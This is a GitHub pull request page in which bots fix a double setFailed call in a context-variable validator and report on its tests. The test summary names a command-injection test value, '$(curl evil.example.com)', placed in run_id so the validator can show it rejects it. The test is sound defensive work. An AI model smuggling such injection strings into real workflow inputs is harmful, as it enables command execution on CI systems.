Skip to content

[jsweep] Clean validate_context_variables.cjs#38785

Merged
pelikhan merged 2 commits into
mainfrom
signed/jsweep/validate-context-variables-78a17fb6b0aa7ebe
Jun 12, 2026
Merged

[jsweep] Clean validate_context_variables.cjs#38785
pelikhan merged 2 commits into
mainfrom
signed/jsweep/validate-context-variables-78a17fb6b0aa7ebe

Conversation

@github-actions

@github-actions github-actions Bot commented Jun 12, 2026
edited
Loading

Copy link
Copy Markdown
Contributor

Summary

Cleans actions/setup/js/validate_context_variables.cjs by removing a redundant try/catch that caused core.setFailed to be called twice on validation failure.

Context Type

This file runs in github-script context — it uses core.info(), core.error(), core.setFailed() and receives context as a global.

Changes Made

Bug Fix: Double setFailed call removed

The old validateContextVariables wrapped all logic in a try/catch where:

  1. On validation failure: setFailed(detailedMessage) called, then throw new Error(detailedMessage)
  2. The catch intercepted that throw and called setFailed(ERR_VALIDATION + ": Context variable validation failed: " + detailedMessage)overwriting the first call

The final error seen by GitHub Actions was ERR_VALIDATION: Context variable validation failed: Context variable validation failed!\n\nFound... — the phrase "Context variable validation failed" appeared twice.

After cleanup

  • Removed the try/catch entirely (the only throws were the expected validation-failure path)
  • ERR_VALIDATION prefix is now included directly in the single setFailed call
  • Extracted failureDetails variable for clarity in error message construction
  • Removed unused getErrorMessage import from error_helpers.cjs

Test Improvements

7 new tests added (36 → 43 total):

Test What it verifies
ERR_VALIDATION prefix in setFailed Error message includes the code prefix
Single setFailed call setFailed called exactly once (not twice)
Empty context → 0 validated Count message shows 0 when no known fields
Correct count reporting Info message shows exact count of checked fields
Multiple failures in one call All failures reported in single error
run_id / run_number validation Top-level context fields are checked
run_id injection rejection $(curl evil.example.com) blocked

Validation Checks ✅

  • Formatting: npm run format:cjs
  • Linting: npm run lint:cjs
  • Type checking: npm run typecheck ✓ (file already had @ts-check)
  • Tests: npm run test:js ✓ — 43/43 tests pass

Generated by 🧹 jsweep - JavaScript Unbloater · 456.8 AIC · ⌖ 30.3 AIC · ⊞ 18.7K ·

  • expires on Jun 13, 2026, 9:22 PM UTC-08:00

Generated by 👨‍🍳 PR Sous Chef · 56.9 AIC · ⌖ 1.01 AIC · ⊞ 17.3K ·

@github-actions
jsweep: clean validate_context_variables.cjs
82f33d1 
- Remove unnecessary try/catch that caused setFailed to be called twice
  on validation failure (first with detailed message, then in catch with
  ERR_VALIDATION prefix, producing 'Context variable validation failed:
- Include ERR_VALIDATION prefix directly in the single setFailed call
- Extract failureDetails variable for clarity in error message construction
- Remove unused getErrorMessage import from error_helpers.cjs
- Add 7 new tests covering: ERR_VALIDATION prefix in error message,
  single setFailed call assertion, empty context (0 fields checked),
  correct validated count reporting, multiple simultaneous failures,
  run_id/run_number top-level validation, and run_id injection rejection

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
@github-actions github-actions Bot mentioned this pull request Jun 12, 2026
Closed
@pelikhan pelikhan marked this pull request as ready for review June 12, 2026 14:16
Copilot AI review requested due to automatic review settings June 12, 2026 14:16
@github-actions

github-actions Bot commented Jun 12, 2026
edited
Loading

Copy link
Copy Markdown
Contributor Author

🧪 Test Quality Sentinel completed test quality analysis.

@github-actions

github-actions Bot commented Jun 12, 2026
edited
Loading

Copy link
Copy Markdown
Contributor Author

Design Decision Gate 🏗️ completed the design decision gate check.

No ADR enforcement needed: PR #38785 does not have the 'implementation' label (has_implementation_label=false) and has 0 new lines of code in business logic directories (well under the 100-line threshold; requires_adr_by_default_volume=false). Neither Condition A nor Condition B is met.

Copilot AI reviewed Jun 12, 2026
View reviewed changes

Copilot AI left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

This PR cleans up the GitHub Actions github-script helper actions/setup/js/validate_context_variables.cjs to avoid calling core.setFailed() twice on validation failures, ensuring the final failure message is not overwritten and does not contain duplicated “Context variable validation failed” text.

Changes:

  • Removed the redundant try/catch wrapper so validation failures produce a single setFailed call with a stable message.
  • Included the ERR_VALIDATION prefix directly in the constructed validation failure message and extracted failureDetails for readability.
  • Added targeted tests to verify single-failure behavior, correct message prefixing, validated-count reporting, and top-level run_id/run_number validation.
Show a summary per file
File Description
actions/setup/js/validate_context_variables.cjs Removes redundant error handling and constructs a single, prefixed failure message for numeric context validation.
actions/setup/js/validate_context_variables.test.cjs Adds coverage to ensure one setFailed call, correct ERR_VALIDATION prefixing, accurate validated counts, and run_id/run_number checks.

Copilot's findings

Tip

Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

  • Files reviewed: 2/2 changed files
  • Comments generated: 0

@github-actions github-actions Bot mentioned this pull request Jun 12, 2026
Closed
@github-actions

github-actions Bot commented Jun 12, 2026

Copy link
Copy Markdown
Contributor Author

🧪 Test Quality Sentinel Report

Test Quality Score: 82/100 — Excellent

Analyzed 43 test(s) across 5 describe blocks: 42 design, 1 implementation, 0 guideline violation(s).

📊 Metrics & Test Classification (43 tests analyzed)
Metric Value
New/modified tests analyzed 43
✅ Design tests (behavioral contracts) 42 (97.7%)
⚠️ Implementation tests (low value) 1 (2.3%)
Tests with error/edge cases 33 (76.7%)
Duplicate test clusters 0
Test inflation detected Yes — 81 lines added to test vs 34 added to production (2.38:1)
🚨 Coding-guideline violations 0

Test Classification Details

Test File Classification Issues Detected
should accept empty values validate_context_variables.test.cjs ✅ Design Edge case: empty string input
should accept undefined values validate_context_variables.test.cjs ✅ Design Edge case: undefined input
should accept null values validate_context_variables.test.cjs ✅ Design Edge case: null input
should accept valid positive integers as numbers validate_context_variables.test.cjs ✅ Design Happy path
should accept valid positive integers as strings validate_context_variables.test.cjs ✅ Design Verifies string coercion
should accept valid negative integers validate_context_variables.test.cjs ✅ Design Edge case: negative
should accept zero validate_context_variables.test.cjs ✅ Design Edge case: zero
should accept integers with leading/trailing whitespace validate_context_variables.test.cjs ✅ Design Edge case: trimming
should reject strings with letters validate_context_variables.test.cjs ✅ Design Error case
should reject strings with special characters validate_context_variables.test.cjs ✅ Design Error case
should reject strings with injection attempts validate_context_variables.test.cjs ✅ Design Security/error case
should reject floating point numbers validate_context_variables.test.cjs ✅ Design Error case
should reject numbers with commas validate_context_variables.test.cjs ✅ Design Error case
should reject scientific notation validate_context_variables.test.cjs ✅ Design Error case
should reject hex numbers validate_context_variables.test.cjs ✅ Design Error case
should reject octal numbers validate_context_variables.test.cjs ✅ Design Error case
should reject binary numbers validate_context_variables.test.cjs ✅ Design Error case
should reject numbers with spaces in the middle validate_context_variables.test.cjs ✅ Design Error case
should reject malicious payloads validate_context_variables.test.cjs ✅ Design Security/error case (7 payloads)
should reject extremely large numbers outside safe integer range validate_context_variables.test.cjs ✅ Design Boundary case
should reject extremely small numbers outside safe integer range validate_context_variables.test.cjs ✅ Design Boundary case
should accept numbers at the edge of safe integer range validate_context_variables.test.cjs ✅ Design Boundary case (MAX/MIN_SAFE_INTEGER)
should get nested values from objects validate_context_variables.test.cjs ✅ Design Happy path
should return undefined for missing paths validate_context_variables.test.cjs ✅ Design Edge case: missing path
should return undefined for null/undefined intermediate values validate_context_variables.test.cjs ✅ Design Edge case: null intermediate
should handle empty path validate_context_variables.test.cjs ✅ Design Edge case: empty path array
should include all expected numeric variables validate_context_variables.test.cjs ✅ Design Verifies path registry contract
should have 30 context paths validate_context_variables.test.cjs ⚠️ Implementation Hardcodes internal count — brittle when paths are legitimately added
should not include duplicate names validate_context_variables.test.cjs ✅ Design Data-invariant check
should not include github.event.head_commit.id validate_context_variables.test.cjs ✅ Design Verifies SHA exclusion contract
should validate all numeric context variables successfully validate_context_variables.test.cjs ✅ Design Happy path
should fail when a numeric field contains non-numeric data validate_context_variables.test.cjs ✅ Design Error case
should pass when numeric fields are valid integers validate_context_variables.test.cjs ✅ Design Happy path
should not validate github.event.head_commit.id (Git SHA) validate_context_variables.test.cjs ✅ Design Verifies SHA exclusion end-to-end
should validate successfully with explicit core and ctx parameters validate_context_variables.test.cjs ✅ Design Happy path
should fail with explicit core and ctx when numeric field is invalid validate_context_variables.test.cjs ✅ Design Error case
should include ERR_VALIDATION prefix in setFailed message validate_context_variables.test.cjs ✅ Design Verifies error code contract
should call setFailed only once on validation failure validate_context_variables.test.cjs ✅ Design Prevents duplicate side effects
should report zero validated variables when context has no known fields validate_context_variables.test.cjs ✅ Design Edge case: empty context
should report the correct count of validated variables validate_context_variables.test.cjs ✅ Design Verifies validation count reporting
should report all failures when multiple invalid fields are present validate_context_variables.test.cjs ✅ Design Error case: multiple failures
should validate run_id and run_number at the top level of context validate_context_variables.test.cjs ✅ Design Happy path
should fail when run_id contains non-numeric data validate_context_variables.test.cjs ✅ Design Security/error case

Language Support

Tests analyzed:

  • 🟨 JavaScript (*.test.cjs): 43 tests (vitest)
  • 🐹 Go (*_test.go): 0 tests
⚠️ Flagged Tests — Requires Review (1 issue)

⚠️ should have 30 context paths (validate_context_variables.test.cjs)

Classification: Implementation test
Issue: Hardcodes the exact count (30) of entries in NUMERIC_CONTEXT_PATHS. Any legitimate addition of a new context path to validate will break this test, even when the behavior is correct.
What design invariant does this test enforce? None beyond a snapshot of the current array size — it does not verify which paths are validated, only how many.
What would break if deleted? Only if someone accidentally removes paths from the list in bulk (but the companion test should include all expected numeric variables would catch removals of named paths).
Suggested improvement: Replace expect(NUMERIC_CONTEXT_PATHS.length).toBe(30) with expect(NUMERIC_CONTEXT_PATHS.length).toBeGreaterThan(0), or expand should include all expected numeric variables to assert all paths exhaustively. Alternatively, keep the count check but add a comment explaining it is a security sentinel.

Verdict

Check passed. 2.3% of new tests are implementation tests (threshold: 30%). The test suite is comprehensive, covering security-critical rejection cases, boundary values, and multi-failure error paths. Mocking of global.core (GitHub Actions runtime) is appropriate for this testing context.

i️ Test inflation flag (informational only): 81 lines were added to the test file versus 34 lines added to the production file (ratio: 2.38:1, threshold: 2:1). This is expected here since the production change was a cleanup/refactoring that removed more lines than it added (-15 net), while tests were written from scratch. No action required.

📖 Understanding Test Classifications

Design Tests (High Value) verify what the system does:

  • Assert on observable outputs, return values, or state changes
  • Cover error paths and boundary conditions
  • Would catch a behavioral regression if deleted
  • Remain valid even after internal refactoring

Implementation Tests (Low Value) verify how the system does it:

  • Assert on internal function calls (mocking internals)
  • Only test the happy path with typical inputs
  • Break during legitimate refactoring even when behavior is correct
  • Give false assurance: they pass even when the system is wrong

Goal: Shift toward tests that describe the system's behavioral contract — the promises it makes to its users and collaborators.

References: §27421437091

🧪 Test quality analysis by Test Quality Sentinel · 211.4 AIC · ⌖ 20.7 AIC · ⊞ 28.3K ·

github-actions[bot]
github-actions Bot commented Jun 12, 2026
View reviewed changes

@github-actions github-actions Bot left a comment

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

✅ Test Quality Sentinel: 82/100. Test quality is excellent — 2.3% of new tests are implementation tests (threshold: 30%). 43 tests analyzed: 42 design, 1 implementation, 0 guideline violations. Strong coverage of security-critical rejection cases, boundary values, and multi-failure error paths.

@github-actions

github-actions Bot commented Jun 12, 2026

Copy link
Copy Markdown
Contributor Author

@copilot summarize any remaining blockers and confirm merge readiness.

Generated by 👨‍🍳 PR Sous Chef · 73.5 AIC · ⌖ 1.05 AIC · ⊞ 17.3K ·

@github-actions github-actions Bot mentioned this pull request Jun 12, 2026
Closed
@github-actions

github-actions Bot commented Jun 12, 2026

Copy link
Copy Markdown
Contributor Author

``
@copilot refresh the branch from base and rerun checks.

Generated by 👨‍🍳 PR Sous Chef · 56.9 AIC · ⌖ 1.01 AIC · ⊞ 17.3K ·

@pelikhan pelikhan merged commit 58d8d86 into main Jun 12, 2026
13 checks passed
@github-actions github-actions Bot mentioned this pull request Jun 13, 2026
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

Copilot code review Copilot Copilot left review comments

Assignees

No one assigned

Labels

automation unbloat

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@pelikhan